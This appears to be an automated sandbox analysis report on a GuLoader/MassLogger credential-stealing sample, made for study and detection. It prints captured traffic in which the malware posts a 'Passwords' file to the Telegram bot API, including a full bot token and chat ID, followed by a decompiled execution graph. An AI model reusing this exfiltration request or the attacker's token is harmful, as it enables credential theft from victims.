                                                                                                              2025-01-10 22:39:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 64 36 66 33 64 33 34 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd331d6f3d349fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:32 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:32 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:32 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43689,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548772,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              23192.168.2.850018149.154.167.220443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:36 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd319dbf9f6463
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 64 62 66 39 66 36 34 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd319dbf9f6463Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:37 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:37 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:37 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43690,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548777,"document":{"file_n


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:17:37:26
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\czHx16QwGQ.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'014'160 bytes
                                                                                                              MD5 hash:1A0FE25178E09CF0FACC1F7BD6F221A8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2176225336.00000000050E2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:17:38:37
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\czHx16QwGQ.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'014'160 bytes
                                                                                                              MD5 hash:1A0FE25178E09CF0FACC1F7BD6F221A8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:19.7%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:20.3%
                                                                                                                Total number of Nodes:1574
                                                                                                                Total number of Limit Nodes:38
                                                                                                                execution_graph 4149 401941 4150 401943 4149->4150 4155 402c41 4150->4155 4156 402c4d 4155->4156 4201 40640a 4156->4201 4159 401948 4161 405afa 4159->4161 4243 405dc5 4161->4243 4164 405b22 DeleteFileW 4166 401951 4164->4166 4165 405b39 4167 405c64 4165->4167 4257 4063e8 lstrcpynW 4165->4257 4167->4166 4286 40672b FindFirstFileW 4167->4286 4169 405b5f 4170 405b72 4169->4170 4171 405b65 lstrcatW 4169->4171 4258 405d09 lstrlenW 4170->4258 4172 405b78 4171->4172 4175 405b88 lstrcatW 4172->4175 4176 405b7e 4172->4176 4178 405b93 lstrlenW FindFirstFileW 4175->4178 4176->4175 4176->4178 4180 405bb5 4178->4180 4181 405c59 4178->4181 4179 405c82 4289 405cbd lstrlenW CharPrevW 4179->4289 4186 405c3c FindNextFileW 4180->4186 4194 405afa 60 API calls 4180->4194 4196 405450 24 API calls 4180->4196 4262 4063e8 lstrcpynW 4180->4262 4263 405ab2 4180->4263 4271 405450 4180->4271 4282 4061ae MoveFileExW 4180->4282 4181->4167 4184 405ab2 5 API calls 4187 405c94 4184->4187 4186->4180 4188 405c52 FindClose 4186->4188 4189 405c98 4187->4189 4190 405cae 4187->4190 4188->4181 4189->4166 4193 405450 24 API calls 4189->4193 4192 405450 24 API calls 4190->4192 4192->4166 4195 405ca5 4193->4195 4194->4180 4197 4061ae 36 API calls 4195->4197 4196->4186 4198 405cac 4197->4198 4198->4166 4216 406417 4201->4216 4202 406662 4203 402c6e 4202->4203 4234 4063e8 lstrcpynW 4202->4234 4203->4159 4218 40667c 4203->4218 4205 406630 lstrlenW 4205->4216 4208 40640a 10 API calls 4208->4205 4210 406545 GetSystemDirectoryW 4210->4216 4211 406558 GetWindowsDirectoryW 4211->4216 4212 40667c 5 API calls 4212->4216 4213 40658c SHGetSpecialFolderLocation 4213->4216 4217 4065a4 SHGetPathFromIDListW CoTaskMemFree 4213->4217 4214 40640a 10 API calls 4214->4216 4215 4065d3 lstrcatW 4215->4216 4216->4202 4216->4205 4216->4208 4216->4210 4216->4211 4216->4212 4216->4213 4216->4214 4216->4215 4227 4062b6 4216->4227 4232 40632f wsprintfW 4216->4232 4233 4063e8 lstrcpynW 4216->4233 4217->4216 4225 406689 4218->4225 4219 4066ff 4220 406704 CharPrevW 4219->4220 4223 406725 4219->4223 4220->4219 4221 4066f2 CharNextW 4221->4219 4221->4225 4223->4159 4224 4066de CharNextW 4224->4225 4225->4219 4225->4221 4225->4224 4226 4066ed CharNextW 4225->4226 4239 405cea 4225->4239 4226->4221 4235 406255 4227->4235 4230 4062ea RegQueryValueExW RegCloseKey 4231 40631a 4230->4231 4231->4216 4232->4216 4233->4216 4234->4203 4236 406264 4235->4236 4237 406268 4236->4237 4238 40626d RegOpenKeyExW 4236->4238 4237->4230 4237->4231 4238->4237 4240 405cf0 4239->4240 4241 405d06 4240->4241 4242 405cf7 CharNextW 4240->4242 4241->4225 4242->4240 4292 4063e8 lstrcpynW 4243->4292 4245 405dd6 4293 405d68 CharNextW CharNextW 4245->4293 4248 405b1a 4248->4164 4248->4165 4249 40667c 5 API calls 4255 405dec 4249->4255 4250 405e1d lstrlenW 4251 405e28 4250->4251 4250->4255 4253 405cbd 3 API calls 4251->4253 4252 40672b 2 API calls 4252->4255 4254 405e2d GetFileAttributesW 4253->4254 4254->4248 4255->4248 4255->4250 4255->4252 4256 405d09 2 API calls 4255->4256 4256->4250 4257->4169 4259 405d17 4258->4259 4260 405d29 4259->4260 4261 405d1d CharPrevW 4259->4261 4260->4172 4261->4259 4261->4260 4262->4180 4299 405eb9 GetFileAttributesW 4263->4299 4266 405adf 4266->4180 4267 405ad5 DeleteFileW 4269 405adb 4267->4269 4268 405acd RemoveDirectoryW 4268->4269 4269->4266 4270 405aeb SetFileAttributesW 4269->4270 4270->4266 4272 40546b 4271->4272 4273 40550d 4271->4273 4274 405487 lstrlenW 4272->4274 4275 40640a 17 API calls 4272->4275 4273->4180 4276 4054b0 4274->4276 4277 405495 lstrlenW 4274->4277 4275->4274 4279 4054c3 4276->4279 4280 4054b6 SetWindowTextW 4276->4280 4277->4273 4278 4054a7 lstrcatW 4277->4278 4278->4276 4279->4273 4281 4054c9 SendMessageW SendMessageW SendMessageW 4279->4281 4280->4279 4281->4273 4283 4061cf 4282->4283 4284 4061c2 4282->4284 4283->4180 4302 406034 4284->4302 4287 406741 FindClose 4286->4287 4288 405c7e 4286->4288 4287->4288 4288->4166 4288->4179 4290 405c88 4289->4290 4291 405cd9 lstrcatW 4289->4291 4290->4184 4291->4290 4292->4245 4294 405d85 4293->4294 4295 405d97 4293->4295 4294->4295 4297 405d92 CharNextW 4294->4297 4296 405dbb 4295->4296 4298 405cea CharNextW 4295->4298 4296->4248 4296->4249 4297->4296 4298->4295 4300 405abe 4299->4300 4301 405ecb SetFileAttributesW 4299->4301 4300->4266 4300->4267 4300->4268 4301->4300 4303 406064 4302->4303 4304 40608a GetShortPathNameW 4302->4304 4329 405ede GetFileAttributesW CreateFileW 4303->4329 4306 4061a9 4304->4306 4307 40609f 4304->4307 4306->4283 4307->4306 4309 4060a7 wsprintfA 4307->4309 4308 40606e CloseHandle GetShortPathNameW 4308->4306 4310 406082 4308->4310 4311 40640a 17 API calls 4309->4311 4310->4304 4310->4306 4312 4060cf 4311->4312 4330 405ede GetFileAttributesW CreateFileW 4312->4330 4314 4060dc 4314->4306 4315 4060eb GetFileSize GlobalAlloc 4314->4315 4316 4061a2 CloseHandle 4315->4316 4317 40610d 4315->4317 4316->4306 4331 405f61 ReadFile 4317->4331 4322 406140 4324 405e43 4 API calls 4322->4324 4323 40612c lstrcpyA 4325 40614e 4323->4325 4324->4325 4326 406185 SetFilePointer 4325->4326 4338 405f90 WriteFile 4326->4338 4329->4308 4330->4314 4332 405f7f 4331->4332 4332->4316 4333 405e43 lstrlenA 4332->4333 4334 405e84 lstrlenA 4333->4334 4335 405e8c 4334->4335 4336 405e5d lstrcmpiA 4334->4336 4335->4322 4335->4323 4336->4335 4337 405e7b CharNextA 4336->4337 4337->4334 4339 405fae GlobalFree 4338->4339 4339->4316 4340 4015c1 4341 402c41 17 API calls 4340->4341 4342 4015c8 4341->4342 4343 405d68 4 API calls 4342->4343 4355 4015d1 4343->4355 4344 401631 4346 401663 4344->4346 4347 401636 4344->4347 4345 405cea CharNextW 4345->4355 4349 401423 24 API calls 4346->4349 4367 401423 4347->4367 4357 40165b 4349->4357 4354 40164a SetCurrentDirectoryW 4354->4357 4355->4344 4355->4345 4356 401617 GetFileAttributesW 4355->4356 4359 4059b9 4355->4359 4362 40591f CreateDirectoryW 4355->4362 4371 40599c CreateDirectoryW 4355->4371 4356->4355 4374 4067c2 GetModuleHandleA 4359->4374 4363 405970 GetLastError 4362->4363 4364 40596c 4362->4364 4363->4364 4365 40597f SetFileSecurityW 4363->4365 4364->4355 4365->4364 4366 405995 GetLastError 4365->4366 4366->4364 4368 405450 24 API calls 4367->4368 4369 401431 4368->4369 4370 4063e8 lstrcpynW 4369->4370 4370->4354 4372 4059b0 GetLastError 4371->4372 4373 4059ac 4371->4373 4372->4373 4373->4355 4375 4067e8 GetProcAddress 4374->4375 4376 4067de 4374->4376 4377 4059c0 4375->4377 4380 406752 GetSystemDirectoryW 4376->4380 4377->4355 4379 4067e4 4379->4375 4379->4377 4381 406774 wsprintfW LoadLibraryExW 4380->4381 4381->4379 4383 4053c4 4384 4053d4 4383->4384 4385 4053e8 4383->4385 4386 405431 4384->4386 4387 4053da 4384->4387 4388 4053f0 IsWindowVisible 4385->4388 4394 405410 4385->4394 4389 405436 CallWindowProcW 4386->4389 4397 4043ab 4387->4397 4388->4386 4391 4053fd 4388->4391 4392 4053e4 4389->4392 4400 404d1a SendMessageW 4391->4400 4394->4389 4405 404d9a 4394->4405 4398 4043c3 4397->4398 4399 4043b4 SendMessageW 4397->4399 4398->4392 4399->4398 4401 404d79 SendMessageW 4400->4401 4402 404d3d GetMessagePos ScreenToClient SendMessageW 4400->4402 4403 404d71 4401->4403 4402->4403 4404 404d76 4402->4404 4403->4394 4404->4401 4414 4063e8 lstrcpynW 4405->4414 4407 404dad 4415 40632f wsprintfW 4407->4415 4409 404db7 4416 40140b 4409->4416 4413 404dc7 4413->4386 4414->4407 4415->4409 4420 401389 4416->4420 4419 4063e8 lstrcpynW 4419->4413 4422 401390 4420->4422 4421 4013fe 4421->4419 4422->4421 4423 4013cb MulDiv SendMessageW 4422->4423 4423->4422 4530 73962993 4531 739629e3 4530->4531 4532 739629a3 VirtualProtect 4530->4532 4532->4531 4871 401e49 4872 402c1f 17 API calls 4871->4872 4873 401e4f 4872->4873 4874 402c1f 17 API calls 4873->4874 4875 401e5b 4874->4875 4876 401e72 EnableWindow 4875->4876 4877 401e67 ShowWindow 4875->4877 4878 402ac5 4876->4878 4877->4878 4879 40264a 4880 402c1f 17 API calls 4879->4880 4882 402659 4880->4882 4881 402796 4882->4881 4883 4026a3 ReadFile 4882->4883 4884 40273c 4882->4884 4885 405f61 ReadFile 4882->4885 4887 4026e3 MultiByteToWideChar 4882->4887 4888 402798 4882->4888 4890 402709 SetFilePointer MultiByteToWideChar 4882->4890 4891 4027a9 4882->4891 4883->4881 4883->4882 4884->4881 4884->4882 4893 405fbf SetFilePointer 4884->4893 4885->4882 4887->4882 4902 40632f wsprintfW 4888->4902 4890->4882 4891->4881 4892 4027ca SetFilePointer 4891->4892 4892->4881 4894 405fdb 4893->4894 4901 405ff3 4893->4901 4895 405f61 ReadFile 4894->4895 4896 405fe7 4895->4896 4897 406024 SetFilePointer 4896->4897 4898 405ffc SetFilePointer 4896->4898 4896->4901 4897->4901 4898->4897 4899 406007 4898->4899 4900 405f90 WriteFile 4899->4900 4900->4901 4901->4884 4902->4881 4903 404dcc GetDlgItem GetDlgItem 4904 404e1e 7 API calls 4903->4904 4914 405037 4903->4914 4905 404ec1 DeleteObject 4904->4905 4906 404eb4 SendMessageW 4904->4906 4907 404eca 4905->4907 4906->4905 4909 404ed9 4907->4909 4910 404f01 4907->4910 4908 40511b 4912 4051c7 4908->4912 4917 4053af 4908->4917 4924 405174 SendMessageW 4908->4924 4913 40640a 17 API calls 4909->4913 4911 40435f 18 API calls 4910->4911 4916 404f15 4911->4916 4918 4051d1 SendMessageW 4912->4918 4919 4051d9 4912->4919 4920 404ee3 SendMessageW SendMessageW 4913->4920 4914->4908 4915 4050fc 4914->4915 4921 405097 4914->4921 4915->4908 4926 40510d SendMessageW 4915->4926 4923 40435f 18 API calls 4916->4923 4925 4043c6 8 API calls 4917->4925 4918->4919 4927 4051f2 4919->4927 4928 4051eb ImageList_Destroy 4919->4928 4935 405202 4919->4935 4920->4907 4922 404d1a 5 API calls 4921->4922 4938 4050a8 4922->4938 4939 404f23 4923->4939 4924->4917 4930 405189 SendMessageW 4924->4930 4931 4053bd 4925->4931 4926->4908 4932 4051fb GlobalFree 4927->4932 4927->4935 4928->4927 4929 405371 4929->4917 4936 405383 ShowWindow GetDlgItem ShowWindow 4929->4936 4934 40519c 4930->4934 4932->4935 4933 404ff8 GetWindowLongW SetWindowLongW 4937 405011 4933->4937 4945 4051ad SendMessageW 4934->4945 4935->4929 4950 404d9a 4 API calls 4935->4950 4954 40523d 4935->4954 4936->4917 4940 405017 ShowWindow 4937->4940 4941 40502f 4937->4941 4938->4915 4939->4933 4944 404f73 SendMessageW 4939->4944 4946 404ff2 4939->4946 4948 404fc0 SendMessageW 4939->4948 4949 404faf SendMessageW 4939->4949 4959 404394 SendMessageW 4940->4959 4960 404394 SendMessageW 4941->4960 4944->4939 4945->4912 4946->4933 4946->4937 4947 40502a 4947->4917 4948->4939 4949->4939 4950->4954 4951 405347 InvalidateRect 4951->4929 4952 40535d 4951->4952 4961 404cd5 4952->4961 4953 40526b SendMessageW 4955 405281 4953->4955 4954->4953 4954->4955 4955->4951 4956 4052e2 4955->4956 4958 4052f5 SendMessageW SendMessageW 4955->4958 4956->4958 4958->4955 4959->4947 4960->4914 4964 404c0c 4961->4964 4963 404cea 4963->4929 4965 404c25 4964->4965 4966 40640a 17 API calls 4965->4966 4967 404c89 4966->4967 4968 40640a 17 API calls 4967->4968 4969 404c94 4968->4969 4970 40640a 17 API calls 4969->4970 4971 404caa lstrlenW wsprintfW SetDlgItemTextW 4970->4971 4971->4963 5269 4016cc 5270 402c41 17 API calls 5269->5270 5271 4016d2 GetFullPathNameW 5270->5271 5273 4016ec 5271->5273 5278 40170e 5271->5278 5272 401723 GetShortPathNameW 5275 402ac5 5272->5275 5274 40672b 2 API calls 5273->5274 5273->5278 5276 4016fe 5274->5276 5276->5278 5279 4063e8 lstrcpynW 5276->5279 5278->5272 5278->5275 5279->5278 5280 40234e 5281 402c41 17 API calls 5280->5281 5282 40235d 5281->5282 5283 402c41 17 API calls 5282->5283 5284 402366 5283->5284 5285 402c41 17 API calls 5284->5285 5286 402370 GetPrivateProfileStringW 5285->5286 5287 4044cf lstrlenW 5288 4044f0 WideCharToMultiByte 5287->5288 5289 4044ee 5287->5289 5289->5288 5290 404850 5291 40487c 5290->5291 5292 40488d 5290->5292 5351 405a32 GetDlgItemTextW 5291->5351 5293 404899 GetDlgItem 5292->5293 5300 4048f8 5292->5300 5296 4048ad 5293->5296 5295 404887 5298 40667c 5 API calls 5295->5298 5299 4048c1 SetWindowTextW 5296->5299 5303 405d68 4 API calls 5296->5303 5297 4049dc 5348 404b8b 5297->5348 5353 405a32 GetDlgItemTextW 5297->5353 5298->5292 5304 40435f 18 API calls 5299->5304 5300->5297 5305 40640a 17 API calls 5300->5305 5300->5348 5302 4043c6 8 API calls 5307 404b9f 5302->5307 5308 4048b7 5303->5308 5309 4048dd 5304->5309 5310 40496c SHBrowseForFolderW 5305->5310 5306 404a0c 5311 405dc5 18 API calls 5306->5311 5308->5299 5315 405cbd 3 API calls 5308->5315 5312 40435f 18 API calls 5309->5312 5310->5297 5313 404984 CoTaskMemFree 5310->5313 5314 404a12 5311->5314 5316 4048eb 5312->5316 5317 405cbd 3 API calls 5313->5317 5354 4063e8 lstrcpynW 5314->5354 5315->5299 5352 404394 SendMessageW 5316->5352 5319 404991 5317->5319 5322 4049c8 SetDlgItemTextW 5319->5322 5326 40640a 17 API calls 5319->5326 5321 4048f1 5324 4067c2 5 API calls 5321->5324 5322->5297 5323 404a29 5325 4067c2 5 API calls 5323->5325 5324->5300 5333 404a30 5325->5333 5327 4049b0 lstrcmpiW 5326->5327 5327->5322 5329 4049c1 lstrcatW 5327->5329 5328 404a71 5355 4063e8 lstrcpynW 5328->5355 5329->5322 5331 404a78 5332 405d68 4 API calls 5331->5332 5334 404a7e GetDiskFreeSpaceW 5332->5334 5333->5328 5337 405d09 2 API calls 5333->5337 5338 404ac9 5333->5338 5336 404aa2 MulDiv 5334->5336 5334->5338 5336->5338 5337->5333 5339 404cd5 20 API calls 5338->5339 5349 404b3a 5338->5349 5341 404b27 5339->5341 5340 404b5d 5356 404381 EnableWindow 5340->5356 5343 404b3c SetDlgItemTextW 5341->5343 5344 404b2c 5341->5344 5342 40140b 2 API calls 5342->5340 5343->5349 5346 404c0c 20 API calls 5344->5346 5346->5349 5347 404b79 5347->5348 5357 4047a9 5347->5357 5348->5302 5349->5340 5349->5342 5351->5295 5352->5321 5353->5306 5354->5323 5355->5331 5356->5347 5358 4047b7 5357->5358 5359 4047bc SendMessageW 5357->5359 5358->5359 5359->5348 5360 401b53 5361 402c41 17 API calls 5360->5361 5362 401b5a 5361->5362 5363 402c1f 17 API calls 5362->5363 5364 401b63 wsprintfW 5363->5364 5365 402ac5 5364->5365 5366 401956 5367 402c41 17 API calls 5366->5367 5368 40195d lstrlenW 5367->5368 5369 402592 5368->5369 5377 4014d7 5378 402c1f 17 API calls 5377->5378 5379 4014dd Sleep 5378->5379 5381 402ac5 5379->5381 5382 401f58 5383 402c41 17 API calls 5382->5383 5384 401f5f 5383->5384 5385 40672b 2 API calls 5384->5385 5386 401f65 5385->5386 5388 401f76 5386->5388 5389 40632f wsprintfW 5386->5389 5389->5388 5390 402259 5391 402c41 17 API calls 5390->5391 5392 40225f 5391->5392 5393 402c41 17 API calls 5392->5393 5394 402268 5393->5394 5395 402c41 17 API calls 5394->5395 5396 402271 5395->5396 5397 40672b 2 API calls 5396->5397 5398 40227a 5397->5398 5399 40228b lstrlenW lstrlenW 5398->5399 5404 40227e 5398->5404 5401 405450 24 API calls 5399->5401 5400 405450 24 API calls 5402 402286 5400->5402 5403 4022c9 SHFileOperationW 5401->5403 5403->5402 5403->5404 5404->5400 5260 40175c 5261 402c41 17 API calls 5260->5261 5262 401763 5261->5262 5263 405f0d 2 API calls 5262->5263 5264 40176a 5263->5264 5265 405f0d 2 API calls 5264->5265 5265->5264 5405 401d5d GetDlgItem GetClientRect 5406 402c41 17 API calls 5405->5406 5407 401d8f LoadImageW SendMessageW 5406->5407 5408 401dad DeleteObject 5407->5408 5409 402ac5 5407->5409 5408->5409 5410 4022dd 5411 4022e4 5410->5411 5414 4022f7 5410->5414 5412 40640a 17 API calls 5411->5412 5413 4022f1 5412->5413 5415 405a4e MessageBoxIndirectW 5413->5415 5415->5414 5416 4028dd 5438 405ede GetFileAttributesW CreateFileW 5416->5438 5418 4028e4 5419 4028f0 GlobalAlloc 5418->5419 5420 402987 5418->5420 5421 402909 5419->5421 5422 40297e CloseHandle 5419->5422 5423 4029a2 5420->5423 5424 40298f DeleteFileW 5420->5424 5439 40345d SetFilePointer 5421->5439 5422->5420 5424->5423 5426 40290f 5427 403447 ReadFile 5426->5427 5428 402918 GlobalAlloc 5427->5428 5429 402928 5428->5429 5430 40295c 5428->5430 5432 4031d6 44 API calls 5429->5432 5431 405f90 WriteFile 5430->5431 5433 402968 GlobalFree 5431->5433 5434 402935 5432->5434 5435 4031d6 44 API calls 5433->5435 5436 402953 GlobalFree 5434->5436 5437 40297b 5435->5437 5436->5430 5437->5422 5438->5418 5439->5426 5440 401563 5441 402a6b 5440->5441 5444 40632f wsprintfW 5441->5444 5443 402a70 5444->5443 4424 4023e4 4425 402c41 17 API calls 4424->4425 4426 4023f6 4425->4426 4427 402c41 17 API calls 4426->4427 4428 402400 4427->4428 4441 402cd1 4428->4441 4431 402438 4433 402444 4431->4433 4445 402c1f 4431->4445 4432 402c41 17 API calls 4435 40242e lstrlenW 4432->4435 4437 402463 RegSetValueExW 4433->4437 4448 4031d6 4433->4448 4434 40288b 4435->4431 4439 402479 RegCloseKey 4437->4439 4439->4434 4442 402cec 4441->4442 4463 406283 4442->4463 4446 40640a 17 API calls 4445->4446 4447 402c34 4446->4447 4447->4433 4449 403201 4448->4449 4450 4031e5 SetFilePointer 4448->4450 4467 4032de GetTickCount 4449->4467 4450->4449 4453 40329e 4453->4437 4454 405f61 ReadFile 4455 403221 4454->4455 4455->4453 4456 4032de 42 API calls 4455->4456 4457 403238 4456->4457 4457->4453 4458 4032a4 ReadFile 4457->4458 4460 403247 4457->4460 4458->4453 4460->4453 4461 405f61 ReadFile 4460->4461 4462 405f90 WriteFile 4460->4462 4461->4460 4462->4460 4464 406292 4463->4464 4465 402410 4464->4465 4466 40629d RegCreateKeyExW 4464->4466 4465->4431 4465->4432 4465->4434 4466->4465 4468 403436 4467->4468 4469 40330c 4467->4469 4470 402e8e 32 API calls 4468->4470 4480 40345d SetFilePointer 4469->4480 4476 403208 4470->4476 4472 403317 SetFilePointer 4478 40333c 4472->4478 4476->4453 4476->4454 4477 405f90 WriteFile 4477->4478 4478->4476 4478->4477 4479 403417 SetFilePointer 4478->4479 4481 403447 4478->4481 4484 406943 4478->4484 4491 402e8e 4478->4491 4479->4468 4480->4472 4482 405f61 